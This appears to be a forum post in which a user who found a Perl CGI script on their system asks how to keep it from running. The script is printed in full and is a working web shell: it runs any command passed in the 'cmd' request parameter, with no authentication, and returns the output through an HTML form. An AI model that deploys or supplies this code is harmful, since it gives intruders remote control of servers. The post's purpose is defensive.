Shell CGI Code

I came across this code. Is there a way to prevent it from running?


#!/usr/bin/perl -w
print "Content-type: text/html\n\n";
use POSIX;
use CGI;

$input = ' bgcolor=white text=black cursor=green font=arial';

$q = new CGI;
$cmd = $q->param('cmd');
$dir = $q->param('dir');
if ($dir) {
chdir ($dir);
}
if ($cmd =~ /cd/) {
@dirs = split(/ /,$cmd);
$cd = $dirs[1];
$cd =~ s/\n//g;
$cd =~ s/\cM//g;
chdir ($cd);
$cmd = '';
}
$cmd = `$cmd 2>&1`;
$here = POSIX::getcwd();
print <<HTML;
<head>
<title>
COMMAND LINE
</title>
</head>
<body bgcolor=white text=black>
<br><br><br><br>
<form method=post>
Current Directory: <br>
____ $here <br>
<input type=hidden name=dir value=$here> <input type=text name=cmd size=100 $input> </form>
<xmp>
HTML
$cmd =~ s/&/&/g;
$cmd =~ s/</</g;
print($cmd);
print "</xmp>";
exit 0;

 

 

 

 

Top